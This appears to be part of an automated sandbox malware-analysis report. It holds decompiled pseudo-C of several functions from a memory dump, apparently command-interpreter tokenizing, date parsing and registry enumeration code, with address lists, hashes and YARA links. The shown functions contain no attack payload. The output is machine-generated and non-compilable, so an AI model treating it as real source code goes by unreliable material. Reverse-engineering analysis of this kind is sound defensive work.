												if(( *(_t210 + 0x28) & 0x20000000) != 0 ||  *(_t210 + 0x28) == 0x8000000a) {
													goto L37;
												} else {
													goto L28;
												}
											}
										}
										_t203 =  *((intOrPtr*)(_t144 + 2));
										_t43 =  &(_t181[2]); // 0x2e
										if(_t203 !=  *_t43) {
											break;
										}
										_t144 = _t144 + 4;
										_t181 =  &(_t181[4]);
										if(_t203 != 0) {
											continue;
										}
										goto L24;
									}
									asm("sbb eax, eax");
									_t145 = _t144 | 0x00000001;
									goto L25;
								}
								_t204 =  *((intOrPtr*)(_t140 + 2));
								_t40 =  &(_t180[2]); // 0x200000
								if(_t204 !=  *_t40) {
									break;
								}
								_t140 = _t140 + 4;
								_t180 =  &(_t180[4]);
								if(_t204 != 0) {
									continue;
								}
								goto L17;
							}
							asm("sbb eax, eax");
							_t141 = _t140 | 0x00000001;
							goto L18;
							L37:
							_t143 = _v12 + 1;
							_v12 = _t143;
						} while (_t143 < _v56);
						goto L38;
					}
					_t163 =  *((intOrPtr*)(_t168 + 0x10));
					_v60 = _t163;
					_v64 = _t173;
					_t164 = L"*.*";
					_v68 = 1;
					_v76 = 0;
					if(_t163 == 0) {
						_t164 = "*";
					}
					 *_t173 = _t164;
					_v64[1] = E011E297B(_v72);
					_v64[3] = 0;
					_t218 = E011E5590( &_v76, _v20, 0x10, 0x10, _t208, 0, 0, 0, 0, 0);
					_t195 = 0;
					if(_t218 != 0) {
						goto L52;
					} else {
						goto L10;
					}
				}
				if(_t123 != 2) {
					if(_t123 == 3) {
						goto L3;
					}
				} else {
					L3:
					_t216 = _v8 & 0x00000001;
					if(_t216 != 0) {
						goto L4;
					}
				}
				return _t123;
			}





























































                                                    0x011e5266
                                                    0x011e5271
                                                    0x011e5274
                                                    0x011e5276
                                                    0x011e527b
                                                    0x011e527e
                                                    0x011e5284
                                                    0x011e5587
                                                    0x00000000
                                                    0x011e5589
                                                    0x011e528a
                                                    0x011e5291
                                                    0x011e52af
                                                    0x011e52b7
                                                    0x011e52be
                                                    0x011e5561
                                                    0x011e5567
                                                    0x011e52d9
                                                    0x011e52dc
                                                    0x011e52e3
                                                    0x011e52e6
                                                    0x011e52ec
                                                    0x00000000
                                                    0x00000000
                                                    0x011e52f4
                                                    0x00000000
                                                    0x011e556f
                                                    0x011e5303
                                                    0x011e530b
                                                    0x011e530e
                                                    0x011e5315
                                                    0x011e5316
                                                    0x011e531e
                                                    0x011e5322
                                                    0x011ef105
                                                    0x011ef105
                                                    0x011ef111
                                                    0x011ef117
                                                    0x011ef117
                                                    0x011ef11a
                                                    0x011e5380
                                                    0x011e5387
                                                    0x00000000
                                                    0x00000000
                                                    0x011e5391
                                                    0x011e5394
                                                    0x011e5521
                                                    0x011e5524
                                                    0x011e552c
                                                    0x011e5537
                                                    0x011e553f
                                                    0x011e5547
                                                    0x011e554e
                                                    0x00000000
                                                    0x011e5555
                                                    0x011e5555
                                                    0x011e5557
                                                    0x011e5557
                                                    0x00000000
                                                    0x011e5557
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e539a
                                                    0x011e539a
                                                    0x011e539d
                                                    0x011e53a5
                                                    0x011e53a8
                                                    0x011e53a8
                                                    0x011e53ab
                                                    0x011e53ae
                                                    0x011e53ae
                                                    0x011e53b4
                                                    0x00000000
                                                    0x00000000
                                                    0x011e53bd
                                                    0x011e53d8
                                                    0x011e53d8
                                                    0x011e53da
                                                    0x011e53dc
                                                    0x00000000
                                                    0x00000000
                                                    0x011e53e2
                                                    0x011e53e7
                                                    0x011e53e7
                                                    0x011e53ea
                                                    0x011e53ea
                                                    0x011e53f0
                                                    0x00000000
                                                    0x00000000
                                                    0x011e53f9
                                                    0x011e5414
                                                    0x011e5414
                                                    0x011e5416
                                                    0x011e5418
                                                    0x00000000
                                                    0x00000000
                                                    0x011e5422
                                                    0x011e5431
                                                    0x011e5431
                                                    0x011e5436
                                                    0x011e5436
                                                    0x011e5439
                                                    0x011e5439
                                                    0x011e543c
                                                    0x011e543f
                                                    0x011e5444
                                                    0x011e5449
                                                    0x011e544b
                                                    0x011e544d
                                                    0x011e5450
                                                    0x011e5450
                                                    0x011e5453
                                                    0x011e5456
                                                    0x011e545e
                                                    0x011e5461
                                                    0x011e5463
                                                    0x011e546b
                                                    0x011ef193
                                                    0x011ef19e
                                                    0x011ef1a6
                                                    0x00000000
                                                    0x011ef1a6
                                                    0x011e547a
                                                    0x011e547f
                                                    0x011e5482
                                                    0x011e5485
                                                    0x011e548c
                                                    0x00000000
                                                    0x00000000
                                                    0x011e5498
                                                    0x011e549d
                                                    0x011e54b4
                                                    0x011e54c0
                                                    0x011e54cc
                                                    0x011e54da
                                                    0x011e54dc
                                                    0x011e54e6
                                                    0x011e54e9
                                                    0x011e54f1
                                                    0x011e54f4
                                                    0x011e54fb
                                                    0x011e5500
                                                    0x011ef140
                                                    0x00000000
                                                    0x011ef140
                                                    0x011e5509
                                                    0x011ef14f
                                                    0x011ef164
                                                    0x011ef16e
                                                    0x00000000
                                                    0x00000000
                                                    0x011ef17b
                                                    0x00000000
                                                    0x00000000
                                                    0x011ef188
                                                    0x00000000
                                                    0x00000000
                                                    0x011ef18e
                                                    0x011ef14f
                                                    0x011e550f
                                                    0x011e550f
                                                    0x00000000
                                                    0x011ef121
                                                    0x011ef128
                                                    0x00000000
                                                    0x011ef13b
                                                    0x00000000
                                                    0x011ef13b
                                                    0x011ef128
                                                    0x011e5422
                                                    0x011e53fb
                                                    0x011e53ff
                                                    0x011e5403
                                                    0x00000000
                                                    0x00000000
                                                    0x011e5409
                                                    0x011e540c
                                                    0x011e5412
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e5412
                                                    0x011e557d
                                                    0x011e557f
                                                    0x00000000
                                                    0x011e557f
                                                    0x011e53bf
                                                    0x011e53c3
                                                    0x011e53c7
                                                    0x00000000
                                                    0x00000000
                                                    0x011e53cd
                                                    0x011e53d0
                                                    0x011e53d6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e53d6
                                                    0x011e5573
                                                    0x011e5575
                                                    0x00000000
                                                    0x011e5511
                                                    0x011e5514
                                                    0x011e5515
                                                    0x011e5518
                                                    0x00000000
                                                    0x011e539a
                                                    0x011e5328
                                                    0x011e532b
                                                    0x011e5330
                                                    0x011e5333
                                                    0x011e5338
                                                    0x011e533f
                                                    0x011e5342
                                                    0x011e5344
                                                    0x011e5344
                                                    0x011e5349
                                                    0x011e535e
                                                    0x011e536c
                                                    0x011e5374
                                                    0x011e5376
                                                    0x011e537a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e537a
                                                    0x011e52c7
                                                    0x011ef0fa
                                                    0x00000000
                                                    0x011ef100
                                                    0x011e52cd
                                                    0x011e52cd
                                                    0x011e52d0
                                                    0x011e52d3
                                                    0x00000000
                                                    0x00000000
                                                    0x011e52d3
                                                    0x011e555e

                                                    APIs
                                                      • Part of subcall function 011E5590: memset.MSVCRT ref: 011E5614
                                                      • Part of subcall function 011E0040: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,011E36B3,011E3691,00000000), ref: 011E0078
                                                      • Part of subcall function 011E0040: RtlFreeHeap.NTDLL(00000000), ref: 011E007F
                                                    • memset.MSVCRT ref: 011E5303
                                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                                    • memset.MSVCRT ref: 011E547A
                                                    • longjmp.MSVCRT(0120B8B8,00000001,?,?,?), ref: 011EF111
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heap$memset$Process$AllocFreelongjmp
                                                    • String ID: *.*
                                                    • API String ID: 539101449-438819550
                                                    • Opcode ID: 27be6b93dd1fcd828cadc6e1e1316623b2fa948dbe10fb922e1a4106583762fe
                                                    • Instruction ID: f272619b77c9fde7b7153aa4ca50a1b8708a0100f008a81fdcae6fb49fc07b02
                                                    • Opcode Fuzzy Hash: 27be6b93dd1fcd828cadc6e1e1316623b2fa948dbe10fb922e1a4106583762fe
                                                    • Instruction Fuzzy Hash: 1AB1B075E00A069BDB6DDFE8C848AAEBBF3AF58318F154069E905EB241D731DD41CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DF090, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 46%
                                                    			E011DF090(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				intOrPtr _t19;
				signed int _t26;
				signed int _t27;
				signed int _t28;
				intOrPtr _t37;
				signed int _t40;
				signed int _t41;
				void* _t43;
				intOrPtr _t46;
				intOrPtr* _t51;
				intOrPtr _t59;
				intOrPtr _t61;
				signed int _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr* _t70;
				intOrPtr _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				signed int _t75;
				void* _t76;
				intOrPtr _t83;

				_t66 = __edx;
				_t17 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t17 ^ _t75;
				_t73 = _a8;
				_v12 = __edx;
				_t70 = __ecx;
				if(_t73 == E011E0210) {
					_t19 = E011E0210(__ecx, __edx);
				} else {
					if(_t73 == E011E0480) {
						_t19 = E011E0480();
					} else {
						if(_t73 == E011E0600) {
							_t19 = E011E0600();
						} else {
							if(_t73 != E011E0620) {
								 *0x12194b4();
								_t19 =  *_t73();
							} else {
								_t19 = E011E0620();
							}
						}
					}
				}
				_t46 = _t19;
				if( *((short*)( *0x120b8a4)) == 0) {
					L21:
					return E011E6FD0(_t46, _t46, _v8 ^ _t75, _t66, _t70, _t73);
				} else {
					_t83 =  *0x11fd554; // 0x0
					if(_t83 != 0) {
					}
					_t68 = E011DF300(0x10, 0x120faa0, 0x2000, 0x10);
					 *0x120fa90 = _t68;
					if(_t68 == 0xffffffff) {
						 *0x120f980 = 0x234a;
						__imp__longjmp(0x120b940, 1);
						goto L49;
					} else {
						_t62 = 0x120faa0;
						_t4 = _t62 + 2; // 0x120faa2
						_t73 = _t4;
						do {
							_t43 =  *_t62;
							_t62 = _t62 + 2;
						} while (_t43 != 0);
						_t5 = (_t62 - _t73 >> 1) + 1; // 0x120fa9f
						 *0x120fa8c = _t5;
						if( *0x120f984 != 0) {
							L49:
							_push(0x120faa0);
							_push(_t68);
							E011E25D9(L"GeToken: (%x) \'%s\'\n");
							_t76 = _t76 + 0xc;
						}
					}
					_t26 = 0x120faa0;
					_t51 = _t70;
					while(1) {
						_t69 =  *_t51;
						if(_t69 !=  *_t26) {
							break;
						}
						if(_t69 == 0) {
							L17:
							_t27 = 0;
						} else {
							_t6 = _t51 + 2; // 0x2b0000
							_t66 =  *_t6;
							if(_t66 !=  *((intOrPtr*)(_t26 + 2))) {
								break;
							} else {
								_t51 = _t51 + 4;
								_t26 = _t26 + 4;
								if(_t66 != 0) {
									continue;
								} else {
									goto L17;
								}
							}
						}
						L18:
						if(_t27 == 0) {
							if( *0x120faa0 == 0xa) {
								goto L34;
							} else {
								_t71 = _v12;
								goto L37;
							}
						} else {
							_t40 =  *0x11fd558; // 0x0
							if( *((char*)(_t40 + 0x120f987)) == 0x33) {
								_t41 = "&";
								while(1) {
									_t59 =  *_t70;
									if(_t59 !=  *_t41) {
										break;
									}
									if(_t59 == 0) {
										L30:
										_t40 = 0;
									} else {
										_t10 = _t70 + 2; // 0x2b0000
										_t61 =  *_t10;
										_t11 = _t41 + 2; // 0x2b0000
										if(_t61 !=  *_t11) {
											break;
										} else {
											_t70 = _t70 + 4;
											_t41 = _t41 + 4;
											if(_t61 != 0) {
												continue;
											} else {
												goto L30;
											}
										}
									}
									L31:
									if(_t40 != 0 ||  *0x120faa0 != 0xa) {
										goto L20;
									} else {
										do {
											L34:
											_t28 = E011DF030(0);
										} while ( *0x120faa0 == 0xa);
										_t66 = 0;
										E011DF300(_t28, 0, 0, 0);
										if( *0x120faa0 == 0x29) {
											goto L21;
										} else {
											_t71 = 0x2e;
											L37:
											_t74 = E011E00B0(0x50);
											if(_t74 == 0) {
												E011F9287(0x50);
												__imp__longjmp(0x120b8b8, 1);
												asm("int3");
												_push( *0x120b8a0);
												E011E25D9(L"Ungetting: \'%s\'\n");
												 *0x120b8a4 =  *0x120b8a0;
												return 0;
											} else {
												 *_t74 = _t71;
												 *((intOrPtr*)(_t74 + 0x38)) = _t46;
												 *0x11fd548 = 1;
												E011DF030(8);
												_t72 = _a4;
												 *0x11fd548 = 0;
												if(_t72 != E011DE8C0) {
													 *0x12194b4();
													_t37 =  *_t72();
												} else {
													_t37 = E011DE8C0();
												}
												 *((intOrPtr*)(_t74 + 0x3c)) = _t37;
												return E011E6FD0(_t74, _t46, _v8 ^ _t75, _t66, _t72, _t74);
											}
										}
									}
									goto L52;
								}
								asm("sbb eax, eax");
								_t40 = _t41 | 0x00000001;
								goto L31;
							} else {
								L20:
								_t66 = 0;
								E011DF300(_t40, 0, 0, 0);
								goto L21;
							}
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t27 = _t26 | 0x00000001;
					goto L18;
				}
				L52:
			}
































                                                    0x011df090
                                                    0x011df098
                                                    0x011df09f
                                                    0x011df0a4
                                                    0x011df0a7
                                                    0x011df0ab
                                                    0x011df0b3
                                                    0x011df0e0
                                                    0x011df0b5
                                                    0x011df0bb
                                                    0x011df1c2
                                                    0x011df0c1
                                                    0x011df0c7
                                                    0x011df1cc
                                                    0x011df0cd
                                                    0x011df0d3
                                                    0x011ec48d
                                                    0x011ec493
                                                    0x011df0d9
                                                    0x011df0d9
                                                    0x011df0d9
                                                    0x011df0d3
                                                    0x011df0c7
                                                    0x011df0bb
                                                    0x011df0e5
                                                    0x011df0f0
                                                    0x011df1ad
                                                    0x011df1bf
                                                    0x011df0f6
                                                    0x011df0f8
                                                    0x011df0fe
                                                    0x011df1d6
                                                    0x011df114
                                                    0x011df116
                                                    0x011df11f
                                                    0x011ec4a1
                                                    0x011ec4ab
                                                    0x00000000
                                                    0x011df125
                                                    0x011df125
                                                    0x011df12a
                                                    0x011df12a
                                                    0x011df130
                                                    0x011df130
                                                    0x011df133
                                                    0x011df136
                                                    0x011df146
                                                    0x011df149
                                                    0x011df14e
                                                    0x011ec4b1
                                                    0x011ec4b1
                                                    0x011ec4b6
                                                    0x011ec4bc
                                                    0x011ec4c1
                                                    0x011ec4c1
                                                    0x011df14e
                                                    0x011df154
                                                    0x011df159
                                                    0x011df160
                                                    0x011df160
                                                    0x011df166
                                                    0x00000000
                                                    0x00000000
                                                    0x011df16f
                                                    0x011df18a
                                                    0x011df18a
                                                    0x011df171
                                                    0x011df171
                                                    0x011df171
                                                    0x011df179
                                                    0x00000000
                                                    0x011df17f
                                                    0x011df17f
                                                    0x011df182
                                                    0x011df188
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011df188
                                                    0x011df179
                                                    0x011df18c
                                                    0x011df18e
                                                    0x011df2da
                                                    0x00000000
                                                    0x011df2e0
                                                    0x011df2e0
                                                    0x00000000
                                                    0x011df2e0
                                                    0x011df194
                                                    0x011df194
                                                    0x011df1a0
                                                    0x011df1e0
                                                    0x011df1f0
                                                    0x011df1f0
                                                    0x011df1f6
                                                    0x00000000
                                                    0x00000000
                                                    0x011df1ff
                                                    0x011df21a
                                                    0x011df21a
                                                    0x011df201
                                                    0x011df201
                                                    0x011df201
                                                    0x011df205
                                                    0x011df209
                                                    0x00000000
                                                    0x011df20f
                                                    0x011df20f
                                                    0x011df212
                                                    0x011df218
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011df218
                                                    0x011df209
                                                    0x011df21c
                                                    0x011df21e
                                                    0x00000000
                                                    0x011df230
                                                    0x011df230
                                                    0x011df230
                                                    0x011df232
                                                    0x011df237
                                                    0x011df243
                                                    0x011df247
                                                    0x011df254
                                                    0x00000000
                                                    0x011df25a
                                                    0x011df25a
                                                    0x011df25f
                                                    0x011df269
                                                    0x011df26d
                                                    0x011ec4c9
                                                    0x011ec4d5
                                                    0x011ec4db
                                                    0x011ec4dc
                                                    0x011ec4e7
                                                    0x011df43d
                                                    0x011df44a
                                                    0x011df273
                                                    0x011df278
                                                    0x011df27a
                                                    0x011df27d
                                                    0x011df287
                                                    0x011df28c
                                                    0x011df28f
                                                    0x011df29f
                                                    0x011df2ea
                                                    0x011df2f0
                                                    0x011df2a1
                                                    0x011df2a1
                                                    0x011df2a1
                                                    0x011df2a9
                                                    0x011df2bb
                                                    0x011df2bb
                                                    0x011df26d
                                                    0x011df254
                                                    0x00000000
                                                    0x011df21e
                                                    0x011df2c8
                                                    0x011df2ca
                                                    0x00000000
                                                    0x011df1a2
                                                    0x011df1a2
                                                    0x011df1a4
                                                    0x011df1a8
                                                    0x00000000
                                                    0x011df1a8
                                                    0x011df1a0
                                                    0x00000000
                                                    0x011df18e
                                                    0x011df2be
                                                    0x011df2c0
                                                    0x00000000
                                                    0x011df2c0
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                                    • API String ID: 0-1704545398
                                                    • Opcode ID: 2b5d0af96e814cbabd102fcacaa2d93e77093fb51009aeaaa89abef7ab3c268d
                                                    • Instruction ID: 57408817a8dd5529476c4dff142a9f40bd4cfef1c67897232c3cf6abd08dabe3
                                                    • Opcode Fuzzy Hash: 2b5d0af96e814cbabd102fcacaa2d93e77093fb51009aeaaa89abef7ab3c268d
                                                    • Instruction Fuzzy Hash: 8B513C317401075BEB3DAFBCD91837A76E2FB95318F49812AD5038B285DB718687C792
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F4159, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 89%
                                                    			E011F4159(signed int __ecx, wchar_t* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t26;
				long _t29;
				void* _t30;
				void* _t32;
				int _t36;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed short _t42;
				long _t45;
				long _t46;
				signed int _t48;
				wchar_t* _t52;
				int _t55;
				signed int _t59;
				void* _t64;
				long* _t66;
				intOrPtr _t69;
				long* _t73;
				void* _t77;
				void* _t78;
				void* _t79;
				wchar_t* _t81;
				signed int _t83;
				signed int _t84;
				void* _t85;

				_t26 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t26 ^ _t84;
				_v32 = __ecx;
				_v28 = _a4;
				_t52 = __edx;
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t55 = 0;
				_v24 = __ecx + 8;
				_t77 = 0;
				while(1) {
					_t81 = _t52;
					_t8 =  &(_t81[0]); // 0x2
					_t73 = _t8;
					do {
						_t29 =  *_t81;
						_t81 =  &(_t81[0]);
					} while (_t29 != _t55);
					_t83 = _t81 - _t73 >> 1;
					if(_t83 > 2 || iswdigit( *_t52 & 0x0000ffff) == 0) {
						L16:
						_t74 =  *_t52 & 0x0000ffff;
						if(( *_t52 & 0x0000ffff) == 0) {
							goto L31;
						} else {
							if(E011DD7D4( &_v20, _t74) == 0) {
								goto L11;
							} else {
								goto L18;
							}
						}
					} else {
						_t45 = _t52[0] & 0x0000ffff;
						if(_t45 == 0 || iswdigit(_t45) != 0) {
							_t46 = wcstol(_t52, 0, 0xa);
							_t66 = _v24;
							_t52 = _t52 + _t83 * 2 + 2;
							_t85 = _t85 + 0xc;
							 *_t66 = _t46;
							_t74 =  *_t52 & 0x0000ffff;
							_v24 =  &(_t66[0]);
							if(( *_t52 & 0x0000ffff) == 0) {
								L31:
								_t77 = _t77 + 1;
								_t30 = 4;
								if(_t77 < _t30) {
									_t78 = _v24;
									_t59 = _t30 - _t77 >> 1;
									_t36 = memset(_t78, 0, _t59 << 2);
									_t79 = _t78 + _t59;
									asm("adc ecx, ecx");
									memset(_t79, _t36, 0);
									_t77 = _t79;
								}
								_t32 = 1;
							} else {
								if(E011DD7D4( &_v20, _t74) != 0) {
									L18:
									_t39 =  *_t52 & 0x0000ffff;
									if(_t39 == 0x70 || _t39 == 0x50) {
										_t64 = 1;
									} else {
										_t64 = 0;
									}
									_t40 = _t52[1] & 0x0000ffff;
									if(_t40 == 0 || _t40 == 0x6d || _t40 == 0x4d) {
										_t74 = _v32;
										_t41 =  *(_t74 + 8) & 0x0000ffff;
										if(_t64 == 0) {
											if(_t41 == 0xc) {
												_t42 = 0;
												goto L30;
											}
										} else {
											if(_t41 != 0xc) {
												_t42 = _t41 + 0xc;
												L30:
												 *(_t74 + 8) = _t42;
											}
										}
										goto L31;
									} else {
										goto L11;
									}
								} else {
									_t48 =  *_t52 & 0x0000ffff;
									_t69 = _v28;
									if(_t77 >= 2) {
										if(_t48 ==  *((intOrPtr*)(_t69 + 2)) || _t48 ==  *((intOrPtr*)(_t69 + 6))) {
											goto L14;
										} else {
											goto L11;
										}
									} else {
										_t74 = _t48;
										if(E011DD7D4(_t69, _t48) != 0) {
											L14:
											_t77 = _t77 + 1;
											_t52 = E011DD7E6(_t52);
											if(_t77 >= 4) {
												goto L16;
											} else {
												_t55 = 0;
												continue;
											}
										} else {
											L11:
											_t32 = 0;
										}
									}
								}
							}
						} else {
							goto L16;
						}
					}
					return E011E6FD0(_t32, _t52, _v8 ^ _t84, _t74, _t77, _t83);
				}
			}





































                                                    0x011f4161
                                                    0x011f4168
                                                    0x011f4176
                                                    0x011f417c
                                                    0x011f417f
                                                    0x011f4181
                                                    0x011f4182
                                                    0x011f4183
                                                    0x011f4188
                                                    0x011f418a
                                                    0x011f418d
                                                    0x011f418f
                                                    0x011f418f
                                                    0x011f4191
                                                    0x011f4191
                                                    0x011f4194
                                                    0x011f4194
                                                    0x011f4197
                                                    0x011f419a
                                                    0x011f41a1
                                                    0x011f41a6
                                                    0x011f424b
                                                    0x011f424b
                                                    0x011f4251
                                                    0x00000000
                                                    0x011f4253
                                                    0x011f425d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f425d
                                                    0x011f41bf
                                                    0x011f41bf
                                                    0x011f41c6
                                                    0x011f41d9
                                                    0x011f41df
                                                    0x011f41e5
                                                    0x011f41e8
                                                    0x011f41eb
                                                    0x011f41f1
                                                    0x011f41f4
                                                    0x011f41fa
                                                    0x011f42a6
                                                    0x011f42a8
                                                    0x011f42a9
                                                    0x011f42ac
                                                    0x011f42b0
                                                    0x011f42b7
                                                    0x011f42b9
                                                    0x011f42b9
                                                    0x011f42bb
                                                    0x011f42bd
                                                    0x011f42bd
                                                    0x011f42bd
                                                    0x011f42c2
                                                    0x011f4200
                                                    0x011f420a
                                                    0x011f425f
                                                    0x011f425f
                                                    0x011f4265
                                                    0x011f4272
                                                    0x011f426c
                                                    0x011f426c
                                                    0x011f426c
                                                    0x011f4273
                                                    0x011f427a
                                                    0x011f4286
                                                    0x011f4289
                                                    0x011f428f
                                                    0x011f429e
                                                    0x011f42a0
                                                    0x00000000
                                                    0x011f42a0
                                                    0x011f4291
                                                    0x011f4294
                                                    0x011f4296
                                                    0x011f42a2
                                                    0x011f42a2
                                                    0x011f42a2
                                                    0x011f4294
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f420c
                                                    0x011f420c
                                                    0x011f420f
                                                    0x011f4215
                                                    0x011f422d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f4217
                                                    0x011f4217
                                                    0x011f4220
                                                    0x011f4235
                                                    0x011f4237
                                                    0x011f423d
                                                    0x011f4242
                                                    0x00000000
                                                    0x011f4244
                                                    0x011f4244
                                                    0x00000000
                                                    0x011f4244
                                                    0x011f4222
                                                    0x011f4222
                                                    0x011f4222
                                                    0x011f4222
                                                    0x011f4220
                                                    0x011f4215
                                                    0x011f420a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f41c6
                                                    0x011f42d3
                                                    0x011f42d3

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: iswdigit$wcstol
                                                    • String ID: aApP
                                                    • API String ID: 644763121-2547155087
                                                    • Opcode ID: 13c19929543b992d4d1fc5e574e4e91b71b5aaa6719b4bf0e1b63874c5fd8980
                                                    • Instruction ID: 0aa3b0cca32f986d17f25b8c548019d41504aff5f6729d95060213638df22435
                                                    • Opcode Fuzzy Hash: 13c19929543b992d4d1fc5e574e4e91b71b5aaa6719b4bf0e1b63874c5fd8980
                                                    • Instruction Fuzzy Hash: F0410379A0011286EF2CDBACE88527FB7B5BF55204715443EEF46DBA85EB30D982C351
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F4B4E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E011F4B4E(void* __ecx, signed int __edx) {
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t24;
				signed int _t26;
				signed int _t31;
				void* _t39;
				void* _t42;
				int _t43;
				signed int _t53;
				signed int _t54;
				int _t59;
				void* _t64;
				int* _t66;
				void* _t67;
				void* _t69;
				signed int _t70;
				void* _t71;
				void* _t80;

				_t63 = __edx;
				_t19 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t19 ^ _t70;
				_t67 = __ecx;
				_v532 = __ecx;
				if(__edx != 0) {
					_t43 = E011DDF40(E011DDEF9(__edx));
					__eflags = _t43;
					if(_t43 == 0) {
						L14:
						_t24 = 1;
						L28:
						__eflags = _v8 ^ _t70;
						return E011E6FD0(_t24, _t43, _v8 ^ _t70, _t63, _t66, _t67);
					}
					_t64 = 0x20;
					_t26 = E011E2349(_t43, _t64);
					__eflags = _t26;
					if(__eflags != 0) {
						__eflags = 0;
						 *_t26 = 0;
					}
					_t50 = _t67;
					_t63 = E011F5662(_t43, _t67, _t43, _t66, _t67, __eflags);
					_v532 = _t63;
					__eflags = _t63;
					if(_t63 == 0) {
						L25:
						_t67 = 1;
						__eflags = 1;
						E011DC5A2(_t50, 0x400023a3, 1, _t43);
						goto L26;
					} else {
						_t53 = _t63;
						_t66 = 0;
						__eflags = 0;
						_t16 = _t53 + 2; // 0x2
						_t69 = _t16;
						do {
							_t31 =  *_t53;
							_t53 = _t53 + 2;
							__eflags = _t31;
						} while (_t31 != 0);
						_t54 = _t53 - _t69;
						__eflags = _t54;
						_t50 = _t54 >> 1;
						if(_t54 == 0) {
							goto L25;
						}
						_push(_t63);
						_push(_t43);
						_t67 = E011E25D9(L"%s=%s\r\n");
						L26:
						E011E0040(_v532);
						E011E0040(_t43);
						L27:
						_t24 = _t67;
						goto L28;
					}
				}
				_t66 = 0;
				_t43 = 0;
				_v536 = 0;
				while(1) {
					_v540 = 0x104;
					_t67 = RegEnumKeyExW(_t67, _t43,  &_v528,  &_v540, _t66, _t66, _t66, _t66);
					if(_t67 != 0) {
						break;
					}
					_t76 = _v528 - 0x2e;
					if(_v528 != 0x2e) {
						L10:
						_t80 =  *0x11fd544 - _t66; // 0x0
						if(_t80 != 0) {
							goto L14;
						}
						_t43 = _t43 + 1;
						_v536 = _t43;
						if(_t67 != 0) {
							goto L27;
						}
						_t67 = _v532;
						continue;
					}
					_t56 = _v532;
					_t63 =  &_v528;
					_t43 = E011F5662(_t43, _v532,  &_v528, _t66, _t67, _t76);
					if(_t43 == 0) {
						_push(_t66);
						_push(GetLastError());
						E011DC5A2(_t56);
						goto L14;
					}
					_t59 = _t43;
					_t10 = _t59 + 2; // 0x2
					_t63 = _t10;
					do {
						_t39 =  *_t59;
						_t59 = _t59 + 2;
					} while (_t39 != _t66);
					if(_t59 != _t63) {
						_push(_t43);
						_push( &_v528);
						_t42 = E011E25D9(L"%s=%s\r\n");
						_t71 = _t71 + 0xc;
						_t67 = _t42;
					}
					E011E0040(_t43);
					_t43 = _v536;
					goto L10;
				}
